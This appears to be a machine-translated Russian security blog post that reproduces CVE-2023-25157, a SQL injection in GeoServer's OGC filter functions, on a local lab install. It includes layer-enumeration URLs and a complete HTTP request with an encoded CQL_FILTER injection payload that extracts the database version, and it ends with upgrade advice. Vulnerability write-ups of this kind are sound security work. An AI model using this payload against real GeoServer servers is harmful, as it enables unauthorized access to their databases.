Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: lyc@Timeline Sec Количество слов в этой статье: 1296. Время чтения: 2~4 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.

0x01 Введение

GeoServer — это J2EE-реализация спецификации веб-сервера OpenGIS. GeoServer можно использовать для простой публикации картографических данных и предоставления пользователям возможности обновлять, удалять и вставлять данные объектов. GeoServer может быстро и легко обмениваться пространственной географической информацией между пользователями.

0x02 Обзор уязвимостей

Номер уязвимости: CVE-2023-25157. В версиях до 2.22.1 и 2.21.4 была обнаружена проблема внедрения SQL в выражениях фильтров и функций, определенных стандартом Открытого геопространственного консорциума (OGC), которая могла позволить злоумышленнику, не прошедшему проверку подлинности, использовать уязвимость для выполнения SQL-инъекции и выполнения вредоносных программ. код.

0x03 Затронутые версии

geoserver<2.18.7 2.19.0<=geoserver<2.19.7 2.20.0<=geoserver<2.20.7 2.21.0<=geoserver<2.21.4 2.22.0<=geoserver<2.22.2

0x04 Настройка среды

Среда настройки GeoServer имеет множество опций. Загрузите версию для Windows здесь.

Ссылка для скачивания: https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download

После скачивания приступаем к установке

Перед установкой этой службы необходимо настроить среду Java, иначе следующий шаг установки среды будет невозможен.

Пароль учетной записи администратора службы следующий. Вы можете использовать пароль по умолчанию или изменить его самостоятельно.

По умолчанию здесь установлен порт 8080, который может конфликтовать. Вы можете изменить конфигурацию самостоятельно. Здесь установлен порт 9999.

После того как все установлено,GeoServerПуть установки по умолчанию следующий:：C:\Program Files\GeoServer\bin,Нажмитеstartup.bat,запустить скрипт,После запуска скрипта,Не закрывайте cmd. просить.

Посетите следующий URL-адрес：http://localhost:9999/geoserver/web/,Здесь указан порт 9999, поскольку в конфигурации выше он был 9999.,когда на самом деле посещаешь,Вам необходимо получить доступ в соответствии с вашим собственным портом. И введите указанный выше пароль учетной записи: admin/geoserver.,Войдите в Геосервер

Войти успешно

0x05 Повторение уязвимости

Выполнение SQL-инъекции уязвимости До,Во-первых, вам необходимо получить информацию о списке географических слоев.,Эта информация является обязательным параметром в полезных данных внедрения SQL.

Доступ по следующему пути для получения информации о списке географических слоев.

http://192.168.254.170:9999/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

<Name>информация на этикетках,Это список географических слоев。Выбирайте здесьne:populated_placesВ качестве информации о списке географических слоев

Затем перейдите по следующему пути, чтобы получить имя атрибута слоя.

http://192.168.254.170:9999/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:populated_places&maxFeatures=1&outputFormat=json

Окончательная полезная нагрузка выглядит следующим образом:

GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
Host: 192.168.254.170:9999
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1p6q6kkghu4bg1x04chtdvm369
Connection: close

Запрос информации о версии базы данных

0x06 Как это исправить

Последняя версия была официально выпущена, и вы можете загрузить и обновить ее до последней версии.